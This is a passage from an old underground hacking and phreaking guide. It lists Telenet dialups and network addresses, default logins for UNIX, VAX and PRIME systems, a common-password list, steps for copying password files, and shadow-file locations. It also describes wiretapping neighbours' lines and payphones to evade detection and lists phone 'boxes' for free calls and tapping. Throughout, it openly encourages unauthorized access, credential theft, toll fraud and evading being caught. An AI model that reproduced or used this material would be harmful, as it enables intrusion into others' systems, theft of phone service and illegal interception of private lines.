c                                       Connect to a host
stat                                    Shows network port
full                                    Network echo
half                                    Terminal echo
telemail                                Mail.(need ID and password)
mail                                    Mail.(need ID and password)
set                                     Select PAD parameters
cont                                    Continue
d                                       Disconnect
hangup                                  Hangs up
access                                  Telenet account.(ID and password)
G. Telenet dialups 
Here is the list of all the Telenet dialups that I know of in the U.S.A., including the city, state, and area code: 

STATE,CITY:                     AREA CODE:                      NUMBER:

AL, Anniston                    205                             236-9711
AL, Birmingham                  205                             328-2310
AL, Decatur                     205                             355-0206
AL, Dothan                      205                             793-5034
AL, Florence                    205                             767-7960
AL, Huntsville                  205                             539-2281
AL, Mobile                      205                             432-1680
AL, Montgomery                  205                             269-0090
AL, Tuscaloosa                  205                             752-1472
AZ, Phoenix                     602                             254-0244
AZ, Tucson                      602                             747-0107
AR, Ft.Smith                    501                             782-2852
AR, Little Rock                 501                             327-4616 
CA, Bakersfield                 805                             327-8146
CA, Chico                       916                             894-6882
CA, Colton                      714                             824-9000
CA, Compton                     213                             516-1007
CA, Concord                     415                             827-3960
CA, Escondido                   619                             741-7756
CA, Eureka                      707                             444-3091
CA, Fresno                      209                             233-0961
CA, Garden Grove                714                             898-9820
CA, Glendale                    818                             507-0909
CA, Hayward                     415                             881-1382
CA, Los Angeles                 213                             624-2251
CA, Marina Del Rey              213                             306-2984
CA, Merced                      209                             383-2557
CA, Modesto                     209                             576-2852
CA, Montery                     408                             646-9092
CA, Norwalk                     213                             404-2237
CA, Oakland                     415                             836-4911
CA, Oceanside                   619                             430-0613
CA, Palo Alto                   415                             856-9995
CA, Pomona                      714                             626-1284
CA, Sacramento                  916                             448-6262
CA, Salinas                     408                             443-4940
CA, San Carlos                  415                             591-0726
CA, San Diego                   619                             233-0233
CA, San Francisco               415                             956-5777
CA, San Jose                    408                             294-9119
CA, San Pedro                   213                             548-6141
CA, San Rafael                  415                             472-5360
CA, San Ramon                   415                             829-6705
CA, Santa Ana                   714                             558-7078
CA, Santa Barbara               805                             682-5361
CA, Santa Cruz                  408                             429-6937
CA, Santa Rosa                  707                             656-6760
CA, Stockton                    209                             957-7610
CA, Thousand Oaks               805                             495-3588
CA, Vallejo                     415                             724-4200
CA, Ventura                     805                             656-6760
CA, Visalia                     209                             627-1201
CA, West Covina                 818                             915-5151
CA, Woodland Hills              818                             887-3160
C0, Colorado                    719                             635-5361
CO, Denver                      303                             337-6060
CO, Ft. Collins                 303                             493-9131
CO, Grand Junction              303                             241-3004
CO, Greeley                     303                             352-8563
CO, Pueblo                      719                             542-4053
CT, Bridgeport                  203                             335-5055
CT, Danbury                     203                             794-9075
CT, Hartford                    203                             247-9479
CT, Middletown                  203                             344-8217
CT, New Britain                 203                             225-7027
CT, New Haven                   203                             624-5954
CT, New London                  203                             447-8455
CT, Norwalk                     203                             866-7404
CT, Stamford                    203                             348-0787
CT, Waterbury                   203                             753-4512
DE, Dover                       302                             678-8328
DE, Newark                      302                             454-7710
DC, Washington                  202                             429-7896
DC, Washington                  202                             429-7800
FL, Boca Raton                  407                             338-3701
FL, Cape Coral                  813                             275-7924
FL, Cocoa Beach                 407                             267-0800
FL, Daytona Beach               904                             255-2629
FL, Ft. Lauderdale              305                             764-4505
FL, Gainsville                  904                             338-0220
FL, Jacksonville                904                             353-1818
FL, Lakeland                    813                             683-5461
FL, Melbourne                   407                             242-8247
FL, Miami                       305                             372-0230
FL, Naples                      813                             263-3033
FL, Ocala                       904                             351-3790
FL, Orlando                     407                             422-4099
FL, Pensacola                   904                             432-1335
FL, Pompano Beach               305                             941-5445
FL, St. Petersburg              813                             323-4026
FL, Sarasota                    813                             923-4563
FL, Tallahassee                 904                             681-1902
FL, Tampa                       813                             224-9920
FL, West Palm Beach             407                             833-6691
GA, Albany                      912                             888-3011
GA, Athens                      404                             548-5590
GA, Atlanta                     404                             523-0834
GA, Augusta                     404                             724-2752
GA, Colombus                    404                             571-0556
GA, Macon                       912                             743-8844
GA, Rome                        404                             234-1428
GA, Savannah                    912                             236-2605
HI, Oahu                        808                             528-0200
ID, Boise                       208                             343-0611
ID, Idaho Falls                 208                             529-0406
ID, Lewiston                    208                             743-0099
ID, Pocatella                   208                             232-1764
IL, Aurora                      312                             896-0620
IL, Bloomington                 309                             827-7000
IL, Chicago                     312                             938-0600
IL, Decatur                     217                             429-0235
IL, Dekalb                      815                             758-2623
IL, Joliet                      815                             726-0070
IL, Peoria                      309                             637-8570
IL, Rockford                    815                             965-0400
IL, Springfield                 217                             753-1373
IL, Urbana                      217                             384-6428
IN, Bloomington                 812                             332-1344
IN, Evansville                  812                             424-7693
IN, Ft. Wayne                   219                             426-2268
IN, Gary                        219                             882-8800
IN, Indianapolis                317                             299-0024
IN, Kokomo                      317                             455-2460
IN, Lafayette                   317                             742-6000
IN, Muncie                      317                             282-6418
IN, South Bend                  219                             233-7104
IN, Terre Haute                 812                             232-5329
IA, Ames                        515                             233-6300
IA, Cedar Rapids                319                             364-0911
IA, Davenport                   319                             324-2445
IA, Des Moines                  515                             288-4403
IA, Dubuque                     319                             556-0783
IA, Iowa City                   319                             351-1421
IA, Sioux City                  712                             255-1545
IA, Waterloo                    319                             232-5441
KS, Lawrence                    913                             843-8124
KS, Manhattan                   913                             537-0948
KS, Salina                      913                             825-7900
KS, Topeka                      913                             233-9880
KS, Wichita                     316                             262-5669
KY, Bowling Green               502                             782-7941
KY, Frankfort                   502                             875-4654
KY, Lexington                   606                             233-0312
KY, Louisville                  502                             589-5580 
KY, Owensboro                   502                             686-8107 
LA, Alexandria                  318                             445-1053 
LA, Baton Rouge                 504                             343-0753 
LA, Lafayette                   318                             233-0002 
LA, Lake Charles                318                             436-0518 
LA, Monroe                      318                             387-6330
LA, New Orleans                 504                             524-4094
LA, Shreveport                  318                             221-5833
ME, Augusta                     207                             622-3123
ME, Brewer                      207                             989-3081
ME, Lewiston                    207                             784-0105
ME, Portland                    207                             761-4000
MD, Annapolis                   301                             224-8550
MD, Baltimore                   301                             727-6060
MD, Frederick                   301                             293-9596
MA, Boston                      617                             292-0662
MA, Brockton                    508                             580-0721
MA, Fall River                  508                             677-4477
MA, Framingham                  508                             879-6798
MA, Lawrence                    508                             975-2273
MA, Lexington                   617                             863-1550
MA, Lowell                      508                             937-5214
MA, New Bedford                 508                             999-2915
MA, Northampton                 413                             586-0510
MA, Pittsfield                  413                             499-7741
MA, Salem                       508                             744-1559
MA, Springfield                 413                             781-3811
MA, Woods Hole                  508                             540-7500
MA, Worcester                   508                             755-4740
MI, Ann Arbor                   313                             996-5995
MI, Battle Creek                616                             968-0929
MI, Detroit                     313                             964-2988
MI, Flint                       313                             235-8517
MI, Grand Rapids                616                             774-0966  
MI, Jackson                     517                             782-8111                        
MI, Kalamazoo                   616                             345-3088
MI, Lansing                     517                             484-0062
MI, Midland                     517                             832-7068
MI, Muskegon                    616                             726-5723
MI, Pontiac                     313                             332-5120
MI, Port Huron                  313                             982-8364
MI, Saginaw                     517                             790-5166
MI, Southfield                  313                             827-4710
MI, Traverse City               616                             946-2121
MI, Warren                      313                             575-9152
MN, Duluth                      218                             722-1719
MN, Mankato                     517                             388-3780
MN, Minneapolis                 612                             341-2459
MN, Rochester                   507                             282-5917
MN, St. Cloud                   612                             253-2064
MS, Gulfport                    601                             863-0024
MS, Jackson                     601                             969-0036
MS, Meridian                    601                             482-2210
MS, Starkville                  601                             324-2155
MO, Columbia                    314                             449-4404
MO, Jefferson City              314                             634-5178
MO, Kansas City                 816                             221-9900
MO, St. Joseph                  816                             279-4797
MO, St. Louis                   314                             421-4990
MO, Springfield                 417                             864-4814
MT, Billings                    406                             245-7649
MT, Great Falls                 406                             771-0067
MT, Helena                      406                             443-0000
MT, Missoula                    406                             721-5900
NE, Lincoln                     402                             475-4964
NE, Omaha                       402                             341-7733
NV, Las Vegas                   702                             737-6861
NV, Reno                        702                             827-6900
NH, Concord                     603                             224-1024
NH, Durham                      603                             868-2924
NH, Manchester                  603                             627-8725
NH, Nashua                      603                             880-6241
NH, Portsmouth                  603                             431-2302
NJ, Atlantic City               609                             348-0561
NJ, Freehold                    201                             780-5030
NJ, Hackensack                  201                             488-6567
NJ, Marlton                     609                             596-1500
NJ, Merchantville               609                             663-9297
NJ, Morristown                  201                             455-0275
NJ, New Brunswick               201                             745-2900
NJ, Newark                      201                             623-0469
NJ, Passaic                     201                             778-5600
NJ, Paterson                    201                             684-7560
NJ, Princeton                   609                             799-5587
NJ, Rahway                      201                             815-1885
NJ, Redbank                     201                             571-0003
NJ, Roseland                    201                             227-5277
NJ, Sayreville                  201                             525-9507
NJ, Trenton                     609                             989-8847
NM, Albuquerque                 505                             243-4479
NM, Las Cruces                  505                             526-9191
NM, Santa Fe                    505                             473-3403
NY, Albany                      518                             465-8444
NY, Binghampton                 607                             772-6642
NY, Buffalo                     716                             847-1440
NY, Dear Park                   516                             667-5566
NY, Hempstead                   516                             292-3800
NY, Ithaca                      607                             277-2142
NY, New York City               212                             741-8100
NY, New York City               212                             620-6000
NY, Plattsburgh                 518                             562-1890
NY, Poughkeepsie                914                             473-2240
NY, Rochester                   716                             454-1020
NY, Syracuse                    315                             472-5583
NY, Utica                       315                             797-0920
NY, Whit Plains                 914                             328-9199
NC, Asheville                   704                             252-9134
NC, Charlotte                   704                             332-3131
NC, Fayetteville                919                             323-8165
NC, Gastonia                    704                             865-4708
NC, Greensboro                  919                             273-2851
NC, High Point                  919                             889-7494
NC, North Wilkesboro            919                             838-9034
NC, Raleigh                     919                             834-8254
NC, Res Tri Park                919                             549-8139
NC, Tarboro                     919                             823-0579
NC, Wilmington                  919                             763-8313
NC, Winston-Salem               919                             725-2126 
ND, Fargo                       701                             235-7717
ND, Grand Forks                 701                             775-7813
ND, Mandan                      701                             663-2256
OH, Canton                      216                             452-0903
OH, Cincinnati                  513                             579-0390
OH, Cleveland                   216                             575-1658
OH, Colombus                    614                             463-9340
OH, Dayton                      513                             461-5254
OH, Elyria                      216                             323-5059
OH, Hamilton                    513                             863-4116
OH, Kent                        216                             678-5115
OH, Lorain                      216                             960-1170
OH, Mansfield                   419                             526-0686
OH, Sandusky                    419                             627-0050
OH, Springfield                 513                             324-1520
OH, Toledo                      419                             255-7881
OH, Warren                      216                             394-0041
OH, Wooster                     216                             264-8920
OH, Youngstown                  216                             743-1296
OK, Bartlesville                918                             336-3675
OK, Lawton                      405                             353-0333
OK, Oklahoma City               405                             232-4546
OK, Stillwater                  405                             624-1113
OK, Tulsa                       918                             584-3247
OR, Corvallis                   503                             754-9273
OR, Eugena                      503                             683-1460
OR, Hood River                  503                             386-4405
OR, Klamath Falls               503                             882-6282
OR, Medford                     503                             779-6343
OR, Portland                    503                             295-3028
OR, Salem                       503                             378-7712
PA, Allentown                   215                             435-3330
PA, Altoona                     814                             949-0310
PA, Carlisle                    717                             249-9311
PA, Danville                    717                             271-0102
PA, Erie                        814                             899-2241
PA, Harrisburg                  717                             236-6882
PA, Johnstown                   814                             535-7576
PA, King Of Prussia             215                             337-4300
PA, Lancaster                   717                             295-5405
PA, Philadelphia                215                             574-9462
PA, Pittsburgh                  412                             288-9950
PA, Reading                     215                             376-8750
PA, Scranton                    717                             961-5321
PA, State College               814                             231-1510
PA, Wilkes-Barre                717                             829-3108
PA, Williamsport                717                             494-1796
PA, York                        717                             846-6550
RI, Providence                  401                             751-7910
SC, Charleston                  803                             722-4303
SC, Columbia                    803                             254-0695
SC, Greenville                  803                             233-3486
SC, Spartenburg                 803                             585-1637
SC, Pierre                      605                             224-0481
SC, Rapid City                  605                             348-2621
SC, Sioux Falls                 605                             336-8593
TN, Bristol                     615                             968-1130
TN, Chattanooga                 615                             756-1161
TN, Clarksville                 615                             552-0032
TN, Johnson City                615                             282-6645
TN, Knoxville                   615                             525-5500
TN, Memphis                     901                             521-0215
TN, Nashville                   615                             244-3702
TN, Oak Ridge                   615                             481-3590
TX, Abilene                     915                             676-9151
TX, Amarillo                    806                             373-0458
TX, Athens                      214                             677-1712
TX, Austin                      512                             928-1130
TX, Brownsville                 512                             542-0367
TX, Bryan                       409                             822-0159
TX, Corpus Christi              512                             884-9030
TX, Dallas                      214                             748-6371
TX, El Paso                     915                             532-7907
TX, Ft. Worth                   817                             332-4307
TX, Galveston                   409                             762-4382
TX, Houston                     713                             227-1018
TX, Laredo                      512                             724-1791
TX, Longview                    214                             236-4205
TX, Lubbock                     806                             747-4121
TX, Mcallen                     512                             686-5360
TX, Midland                     915                             561-9811
TX, Nederland                   409                             722-3720
TX, San Angelo                  915                             944-7612
TX, San Antonio                 512                             225-8004
TX, Sherman                     214                             893-4995
TX, Temple                      817                             773-9723
TX, Tyler                       214                             597-8925
TX, Waco                        817                             752-9743
TX, Wichita Falls               817                             322-3774
UT, Ogden                       801                             627-1630
UT, Provo                       801                             373-0542
UT, Salt Lake City              801                             359-0149
VT, Burlington                  802                             864-0808
VT, Montpelier                  802                             229-4966
VT, Rutland                     802                             775-1676
VT, White River Jct.            802                             295-7631 
VA, Blacksburg                  703                             552-9181 
VA, Charlottesville             804                             977-5330 
VA, Covington                   703                             962-2217 
VA, Fredericksburg              703                             371-0188 
VA, Harrisonburg                703                             434-7121
VA, Herndon                     703                             435-1800
VA, Lynchburg                   804                             845-0010
VA, Newport News                804                             596-6600
VA, Norfolk                     804                             625-1186
VA, Richmond                    804                             788-9902
VA, Roanoke                     703                             344-2036
WA, Auburn                      206                             939-9982
WA, Bellingham                  206                             733-2720
WA, Everett                     206                             775-9929
WA, Longview                    206                             577-5835
WA, Olympia                     206                             754-0460
WA, Richland                    509                             943-0649
WA, Seattle                     206                             625-9612
WA, Spokane                     509                             455-4071
WA, Tacoma                      206                             627-1791
WA, Vancouver                   206                             693-6914
WA, Wenatchee                   509                             663-6227
WA, Yakima                      509                             575-1060
WV, Charleston                  304                             343-6471
WV, Huntington                  304                             523-2802
WV, Morgantown                  304                             292-0104
WV, Wheeling                    304                             233-7732
WI, Beloit                      608                             362-5287
WI, Eau Claire                  715                             836-9295 
WI, Green Bay                   414                             432-2815 
WI, Kenosha                     414                             552-9242
WI, La Crosse                   608                             784-0560 
WI, Madison                     608                             257-5010 
WI, Milwaukee                   414                             271-3914
WI, Neenah                      414                             722-7636
WI, Racine                      414                             632-6166
WI, Sheboygan                   414                             452-3995
WI, Wausau                      715                             845-9584
WI, West Bend                   414                             334-2206
WY, Casper                      307                             265-5167
WY, Cheyenne                    307                             638-4421
WY, Laramie                     307                             721-5878
H. Telenet DNIC's 
Here is the list of all the Telenet DNIC's. These will be defined and explained in the next section: 

DNIC:                           NETWORK:                        

02041                           Datanet-1
02062                           DCS
02080                           Transpac
02284                           Telepac (Switzerland)
02322                           Datex-P (Austria)
02392                           Radaus
02342                           PSS
02382                           Datapak (Denmark)
02402                           Datapak (Sweden)
02405                           Telepak
02442                           Finpak
02624                           Datex-P (West Germany)
02704                           Luxpac
02724                           Eirpak
03020                           Datapac
03028                           Infogram
03103                           ITT/UDTS (U.S.A.)
03106                           Tymnet
03110                           Telenet
03340                           Telepac (Mexico)
03400                           UDTS (Curacau)
04251                           Isranet
04401                           DDX-P
04408                           Venus-P
04501                           Dacom-Net
04542                           Intelpak
05052                           Austpac
05053                           Midas
05252                           Telepac (Hong Kong)
05301                           Pacnet
06550                           Saponet
07240                           Interdata
07241                           Renpac
07421                           Dompac
09000                           Dialnet
I. Telenet NUA's 
Here is a list of a few Telenet NUA's and what type of system they are. But first, this is how an NUA is put together: 

                    031106170023700
                    \   /\ /  \ /
                      |   |    |
                   DNIC Area  NUA
                        Code
The DNIC says which network connected to Telenet you are using. The area code is the area code for the area that the NUA is in. And the NUA is the address of the computer on Telenet. Please note that an NUA does NOT have to be in your area code for you to connect to it. 
There are two ways of finding useful NUA's. The first way is to get or write an NUA scanning program. The second way is to get a copy of the Legion Of Doom's Telenet Directory.( Volume 4 of the LOD Technical Journals) 

Now, here is the list. Remember that these are only a few NUA's. These are NOT all of the Telenet NUA's. All of these NUA's DO accept reverse charging. Also, please note that all of these may not be working by the time you read this and that network congestion frequently makes an NUA inaccessible for a short period of time. 

NUA:                                            SYSTEM TYPE:

031102010022500                                 VAX
031102010015600                                 UNIX
031102010022000                                 VAX
031102010025900                                 UNIX
031102010046100                                 VAX
031102010025200                                 PRIME
031102010046100                                 VAX
031102010052200                                 VAX
031102020001000                                 PRIME
031102020013200                                 VAX
031102020014100                                 PRIME
031102020014200                                 PRIME
031102020015000                                 VAX
031102020016100                                 UNIX
031102020021400                                 PRIME
031102020024500                                 AOS
031102020030800                                 PRIME
031102020030900                                 PRIME
031102020031200                                 PRIME
031102020033600                                 VAX
031102020033700                                 VAX
031102020034300                                 PRIME
031102020036000                                 HP-3000 
031102030007500                                 VAX
031102030002200                                 VM/370
031102030013600                                 PRIME
031102060003200                                 HP-3000
031102060044000                                 VAX
031102060044900                                 NOS
031102060044700                                 VM/370
031102120003900                                 NOS
031102120015200                                 PRIME
031102120026600                                 VAX
031102120026300                                 VAX
031102120026700                                 UNIX
031102120044900                                 UNIX
031102120053900                                 VOS
031102140024000                                 VAX
J. Basic UNIX hacking 
UNIX is probably the most commonly used operating system on Telenet, and is the easiest to hack since it doesn't record bad login attempts. You know you've found a UNIX system when it gives you a "Login" prompt, and then a "Password" prompt. To get in you should first try the default logins.(Listed below.) If these don't work try some of the passwords listed in Section M. If these don't work try to find backdoors. These are passwords that may have been put in to allow the programmer (or someone else who could be in a position to make a backdoor) to get access into the system. These are usually not known about by anyone but the individual who made it. Try doing some research on the programmer and other people who helped to make the system. And, if these don't work, just try guessing them. The Login (usually the account holders name) has 1-8 characters and the Password is 6-8 characters. Both can be either letters or numbers, or a combination of the two. 

Once you get in, you should get a "$" prompt, or some other special character like it. You should only use lower case letters when hacking UNIX, this seems to be standard format. If you type "man [command]" at the prompt, it should list all of the commands for that system. Anyway, here are the default Logins and Passwords: 

Login:                          Password:

root                            root
root                            system
sys                             sys
sys                             system
daemon                          daemon
uucp                            uucp
tty                             tty
test                            test
unix                            unix
unix                            test
bin                             bin
adm                             adm
adm                             admin
admin                           adm
admin                           admin
sysman                          sysman
sysman                          sys
sysman                          system
sysadmin                        sysadmin
sysadmin                        sys
sysadmin                        system
sysadmin                        admin
sysadmin                        adm
who                             who
learn                           learn
uuhost                          uuhost
guest                           guest
host                            host
nuucp                           nuucp
rje                             rje
games                           games
games                           player
sysop                           sysop
root                            sysop
demo                            demo
Once you are in, the first thing that you need to do is save the password file to your hard drive or to a disk. The password file contains the Logins and Passwords. The passwords are encoded. To get the UNIX password file, depending on what type of UNIX you are in, you can type one of the following things: 
/etc/passwd 
or 
cat /etc/passwd 

The first one is the standard command, but there are other commands as well, like the second one. Once you get the password file, it should look like this: 

john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john 

Broken down, this is what the above password file states: 

Username: john 
Encrypted Password: 234abc56 
User Number: 9999 
Group Number: 13 
Other Information: John Johnson 
Home Directory: /home/dir/john 
Shell: /bin/john 

If the password file does not show up under one of the above two commands, then it is probably shadowed. 

The following definition of password shadowing was taken from the alt.2600 hack faq: 

"Password shadowing is a security system where the encrypted password field is replaced with a special token and the encrypted password is stored in a seperate file which is not readable by normal system users." 

If the password file is shadowed, you can find it in one of the following places, depending on the type of UNIX you are using: 

UNIX System Type:               Path:                                           Token:

AIX 3                           /etc/security/passwd                            ! 
or                              /tcb/auth/files/(first letter of                        
                                username)/(username)                            #

A/UX 3.Os                       /tcb/files/auth/                                *

BSD4.3-Reno                     /etc/master.passwd                              *

ConvexOS 10                     /etc/shadpw                                     *

Convex0S 11                     /etc/shadow                                     *

DG/UX                           /etc/tcb/aa/user                                *

EP/IX                           /etc/shadow                                     x

HP-UX                           /.secure/etc/passwd                             *

IRIX 5                          /etc/shadow                                     x

Linux 1.1                       /etc/shadow                                     *

OSF/1                           /etc/passwd[.dir|.pag]                          *

SCO UNIX #.2.x                  /tcb/auth/files/(first letter of                *
                                username)/(username)

SunOS 4.1+c2                    /etc/security/passwd.adjunct                    #

SunOS 5.0                       /etc/shadow                                     #

System V 4.0                    /etc/shadow                                     x
        
System V 4.2                    /etc/security/database                          *

Ultrix 4                        /etc/auth[.dir|.pag]                            *

UNICOS                          /etc/udb                                        *
Some passwords can only be used for a certain amount of time without having to be changed, this is called password aging. In the password file example below, the "C.a4" is the password aging data: 
bob:123456,C.a4:6348:45:Bob Wilson:/home/dir/bob:/bin/bob 

The characters in the password aging data stand for the following: 

1. Maximum number of weeks a password can be used without changing. 
2. Minimum number of weeks a password must be used before being changed. 
3&4. Last time password was changed, in number of weeks since 1970. 

The password aging data can be decoded using the chart below: 

Character:                      Number:

.                               0
/                               1
0                               2
1                               3
2                               4
3                               5
4                               6
5                               7
6                               8
7                               9
8                               10
9                               11
A                               12
B                               13
C                               14
D                               15      
E                               16
F                               17
G                               18
H                               19      
I                               20
J                               21
K                               22
L                               23
M                               24
N                               25
O                               26
P                               27
Q                               28
R                               29
S                               30
T                               31
U                               32
V                               33
W                               34
X                               35
Y                               36
Z                               37
a                               38
b                               39
c                               40
d                               41
e                               42
f                               43
g                               44
h                               45
i                               46
j                               47
k                               48
l                               49
m                               50
n                               51
o                               52
p                               53
q                               54
r                               55
s                               56
t                               57
u                               58
v                               59
w                               60
x                               61
y                               62
z                               63
Now, explore the system freely, be careful, and have fun! 
K. Basic VAX/VMS hacking 

The VAX system runs the VMS (Virtual Memory System) operating system. You know that you have a VAX system when you get a "username" prompt. Type in capital letters, this seems to be standard on VAX's. Type "HELP" and it gives you all of the help that you could possibly want. Here are the default usernames and passwords for VAX's: 

Username:                       Password:

SYSTEM                          OPERATOR
SYSTEM                          MANAGER
SYSTEM                          SYSTEM
SYSTEM                          SYSLIB
OPERATOR                        OPERATOR
SYSTEST                         UETP
SYSTEST                         SYSTEST
SYSTEST                         TEST
SYSMAINT                        SYSMAINT
SYSMAINT                        SERVICE
SYSMAINT                        DIGITAL
FIELD                           FIELD
FIELD                           SERVICE
GUEST                           GUEST
GUEST                           unpassworded
DEMO                            DEMO
DEMO                            unpassworded
TEST                            TEST
DECNET                          DECNET
Here are some of the VAX/VMS commands: 
Command:                        Function:

HELP (H)                        Gives help and list of commands.
TYPE (T)                        View contents of a file.
RENAME (REN)                    Change name of a file.
PURGE (PU)                      Deletes old versions of a file.
PRINT (PR)                      Prints a file.
DIRECTORY (DIR)                 Shows list of files.
DIFFERENCES     (DIF)           Shows differences between files.
CREATE (CR)                     Creates a file.
DELETE (DEL)                    Deletes a file.
COPY (COP)                      Copy a file to another.
CONTINUE (C)                    Continues session.
The password file on VAX's are available when you type in the command: 
SYS$SYSTEM:SYSUAF.DAT 

The password file on most VAX's are usually not available to normal system users, but try it anyway. If the default logins don't work, use the same means of finding one as stated in Section J. 

Be VERY careful when hacking VAX's becuase they record every bad login attempt. They are sometimes considered one of the most secure systems. Because of this, I advise not to try hacking these until you are more advanced. 

But, when you are an advanced hacker, or if you are already an advanced hacker, I advise that you try a few passwords at a time and then wait and try a few more the next day and so on, because when the real user logs on it displays all of the bad login attempts. 

L. Basic PRIME hacking 

PRIME computer systems greet you with "Primecon 18.23.05", or something like it, when you connect. You should type in capital letters on this system, too. Once you connect, it will usually just sit there. If this happens, type "LOGIN ". It should then ask you for your username and password. The default usernames and passwords are listed below: 

Username:               Password:

PRIME                   PRIME
PRIME                   PRIMOS
PRIMOS                  PRIMOS
PRIMOS                  PRIME
PRIMOS_CS               PRIME
PRIMOS_CS               PRIMOS
PRIMENET                PRIMENET
SYSTEM                  SYSTEM
SYSTEM                  PRIME
SYSTEM                  PRIMOS
NETLINK                 NETLINK
TEST                    TEST
GUEST                   GUEST
GUEST1                  GUEST
When you are inside the system, type "NETLINK" and it ahould give you alot of help. This system uses NUA's, too. I might print these in the next volume. 
M. Password List 

The password list was taken from A Novice's Guide To Hacking, by The Legion Of Doom, and from some of my own discoveries. Here is the list of commonly used passwords: 

Password:

aaa
academia
ada
adrian
aerobics
airplane
albany
albatross
albert
alex
alexander
algebra
alias
alisa
alpha
alphabet
ama
amy
analog
anchor
andy
andrea
animal
answer
anything
arrow
arthur
ass
asshole
athena
atmosphere
bacchus
badass
bailey
banana
bandit
banks
bass
batman
beautiful
beauty
beaver
daniel
danny
dave
deb
debbie
deborah
december
desire
desperate
develop
diet
digital
discovery
disney
dog
drought
duncan
easy
eatme
edges
edwin
egghead
eileen
einstein
elephant
elizabeth
ellen
emerald
engine
engineer
enterprise
enzyme
euclid
evelyn
extension
fairway
felicia
fender
finite
format
god
hello
idiot
jester
john
johnny
joseph
joshua
judith
juggle
julia
kathleen
kermit
kernel
knight
lambda
larry
lazarus
lee
leroy
lewis
light
lisa
louis
love
lynne
mac
macintosh
mack
maggot
magic
malcolm
mark
markus
martin
marty
marvin
matt
master
maurice
maximum
merlin
mets
michael
michelle
mike
minimum
nicki
nicole
rascal
really
rebecca
remote
rick
reagan
robot
robotics
rolex
ronald
rose
rosebud
rosemary
roses
ruben
rules
ruth
sal
saxon
scheme
scott
secret
sensor
serenity
sex
shark
sharon
shit
shiva
shuttle
simon
simple
singer
single
singing
smile
smooch
smother
snatch
snoopy
soap
socrates
spit
spring
subway
success
summer
super
support
surfer
suzanne
tangerine
tape
target
taylor
telephone
temptation
tiger
tigger
toggle
tomato
toyota
trivial
unhappy
unicorn
unknown
urchin
utility
vicki
virgin
virginia
warren
water
weenie
whatnot
whitney
will
william
winston
willie
wizard
wonbat
yosemite
zap
N. Connecting modems to different phone lines 
Ok, if you are really paranoid (or smart) and you don't want to hack from your house for fear of getting caught, you can hook up your modem to other peoples phone lines or to payphones. 

If you want to hook your modem to a payphone, do it late at night and at a very secluded payphone. Look along either side of the phone. You should see a small metal tube (which contains the telephone wires) running along the wall. Somewhere along the tube it should widen out into a small box. Pop off the boxes lid and there is a nice little phone jack for ya'. Taking off the lid may be difficult because they are usually pretty secure, but nothing is impossible, so keep trying. Of course, you can only do this with a lap-top computer. 

Now, if you want to hook up the modem to someone's house or appartment phone line, you need to get a pair of red and green alligator clips, and an extra modem cord for your lap-top. After you get those parts, cut the plastic end off of your modem cord and you will see a red wire, a green wire, and two other wires, but you can ignore those. Attach the red alligator clip to the red wire, and attach the green alligator clip to the green wire and you're all set. Now all you need to do is go find a telephone pole or one of those small green boxes that stick out of the ground.(They should have a Bell Systems logo on them.) 

On a telephone pole open the little box that has a bunch of wires going to and from it. On the right side of the box you should see what look like two large screws.(These are called "terminals".) One should have a red wire wrapped around it and the other should have a green wire wrapped around it. Attach the red alligator clip the the red wire and the green alligator clip to the green wire, and you're all set. This should get you a dial tone. If it doesn't, make sure that the alligator clips are not touching each other, and that the alligator clips are attached to the exposed end of the wire. 

Now, on those green boxes you need to undo all of the screws and shit holding the lid on, and open it up. Then you should find basically the same setup as in the telephone pole. Attach the appropriate wires to the appropriate terminals and you are all set. 

This process can also be used to hook up a Beige Box (Lineman's Handset.) when phreaking. 

O. Viruses, Trojans, and Worms 

Just in case some of you are interested, here are the definitions for Viruses, Trojans, and Worms. These definitions were taken from the alt.2600 hack faq. 

Trojan: 

"Remember the Trojan Horse? Bad guys hid inside it until they could get into the city to do their evil deed. A Trojan computer program is similiar. It is a program which does an unauthorized function, hidden inside an authorized program. It does something other than it claims to do, usually something malicious (although not necessarily!), and it is intended by the author to do whatever it does. If it is not intentional, it is called a bug or, in some cases, a feature :) Some Virus scanning programs detect some Trojans. Some scanning programs don't detect any Trojans. No Virus scanners detect all Trojans." 

Virus: 

"A Virus is an independent program which reproduces itself. It may attach itself to other programs, it may create copies of itself (as in companion Viruses). It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. Some Viruse scanners detect some Viruses. No Virus scanners detect all Viruses. No Virus scanner can protect against any and all Viruses, known and unknown, now and forevermore." 

Worm: 

"Made famous by Robert Morris, Jr., Worms are programs which reproduce by copying themselves over and over, system to system, using up resources and sometimes slowing down the system. They are self contained and use the networks to spread, in much the same way that Viruses use files to spread. Some people say the solution to Viruses and worms is to just not have any files or networks. They are probably correct. We could include computers." 

II. PHREAKING 

A. What is phreaking 

Phreaking is basically hacking with a telephone. Using different "boxes" and "tricks" to manipulate the phone companies and their phones, you gain many things, two of which are: knowledge about telephones and how they work, and free local and long distance phone calls. In the following sections, you will learn some about boxes, what they are, and how they work. You will also learn about the other forms of phreaking. 

B. Why phreak? 

Phreaking, like hacking, is used to gather information about telephones, telephone companies, and how they work. There are other benefits as well. As stated above, you also get free phone calls. But, these are used mainly to gather more information about the phones, and to allow us free access to all information. 

C. Phreaking rules 

Most of the same rules apply for hacking and phreaking, so I will only list a few here. 

1. Never box over your home phone line. 
2. You should never talk about phreaking projects over your home phone line. 
3. Never use your real name when phreaking. 
4. Be careful who you tell about your phreaking projects. 
5. Never leave phreaking materials out in the open. Keep them in a safe place. 
6. Don't get caught. 

D. Where and how to start phreaking 

Well, you can phreak on any telephone, but as stated above, it is very stupid to do so on your home phone line. First you need you need to construct the boxes needed for what you want to do. All of the boxes and their descriptions are listed in the next section. Most of the boxes are very easy to make, but if your not into making shit, there are usually alternative ways of making them. 

E. Boxes and what they do 

Box:                            Description:

Red Box                         generates tones for free phone calls
Black Box                       when called, caller pays nothing
Beige Box                       lineman's handset
Green Box                       generates coin return tones
Cheese Box                      turns your phone into a payphone
Acrylic Box                     steal 3-way calling and other services
Aqua Box                        stops F.B.I. lock-in-trace
Blast Box                       phone microphone amplifier
Blotto Box                      shorts out all phones in your area
Blue Box                        generates 2600hz tone
Brown Box                       creates party line
Bud Box                         tap neighbors phone 
Chatreuse Box                   use electricity from phone
Chrome Box                      manipulates traffic signals
Clear Box                       free calls
Color Box                       phone conversation recorder
Copper Box                      causes crosstalk interference
Crimson Box                     hold button
Dark Box                        re-route calls
Dayglo Box                      connect to neighbors phone line
Divertor Box                    re-route calls
